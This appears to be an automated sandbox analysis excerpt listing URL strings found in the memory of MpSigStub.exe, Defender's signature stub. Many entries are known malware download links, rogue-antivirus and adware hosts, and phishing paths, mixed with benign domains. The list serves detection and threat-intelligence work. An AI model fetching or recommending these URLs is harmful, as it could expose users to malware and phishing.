Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=fkl&key=%s&v=%s
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://stankomeland.duckdns.org/js//share.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp String found in binary or memory: http://statapi.aldtop.com
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sturfajtn.com
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://sys-doctor.com
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?js
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://t.jdjdcjq.top/
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: http://t.me/decovid19bot
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://tbapi.search.ask.comxb
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
Source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://test.1g.io:3000
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://tikotin.com
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://toolbarpartner.com
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://tpbtrack.info/index.php
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://trail.filespm.com/dealdo/install-report
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18265560901.0000021B5F5C8000.00000004.00000001.sdmp String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://trusted-player.info/
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://tu5amrmm.systotal.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout/silent
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://tube77.us.to/
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://update.shop-guide.co.kr/update/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://update.sykehuspartner.no/splunk/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://uprotect.co.kr
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://urels.ml/sokha2.php
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://usd.881515.net/down/1.exe
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://uu.f126.com/ie.txt
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://uu.f126.com/ie_up.exe
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://vbatools.pl/lista-aplikacji/
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://videoall.net
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/6348852
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp String found in binary or memory: http://w.nanweng.cn/qy/gl
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://web/cdr/DISP/plazma_2/backend/phone.php
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://webapp.torntv.com
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://webpatch.ragnarok.co.kr/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://websearch.gettango.com/?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://webspyshield.com/a/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://weeshoppi.com/wp-includes/id4/m4hg5vm7xsh6utv.exe
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://wewewewewesesesesasbacwederffggffddsss.duckdns.org/svch/
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: http://whatami.us.to/tc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://white.shougouji.top
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://whoisthis.100webspace.net/a.php?post=
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://wijmo.com/
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://win7updates.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://winantiviruspro.net/buy.php?affid=
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://winbutler.com/a.php
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://windowstation.bar/opzi0na1la.dll
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://winmediapackage.com/rd/out.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://winshow.biz/feat/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://wizzcaster.com/api/v
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://wmjqr.cn
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://wmr-moneys.org/config/line.gif
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://woah90s.com/hqalzrakueii/nbsa
